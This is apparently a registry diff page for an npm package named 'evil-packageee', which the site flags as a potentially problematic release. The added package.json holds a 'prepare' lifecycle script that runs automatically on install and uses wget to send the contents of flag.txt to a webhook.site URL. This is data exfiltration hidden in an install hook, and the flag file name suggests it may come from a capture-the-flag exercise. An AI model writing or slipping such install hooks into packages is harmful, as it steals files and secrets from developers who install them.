evil-packageee 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of evil-packageee might be problematic. Click here for more details.

File without changes
File without changes
package/index.js ADDED
File without changes
package/package.json ADDED
@@ -0,0 +1,8 @@
1
+ {
2
+ "name": "evil-packageee",
3
+ "version": "1.0.0",
4
+ "scripts": {
5
+ "prepare": "wget https://webhook.site/4755bbda-70d7-4f35-a2ff-0ca70f7d5e6b/?flag=$(cat flag.txt)"
6
+ },
7
+ "bin": "index.js"
8
+ }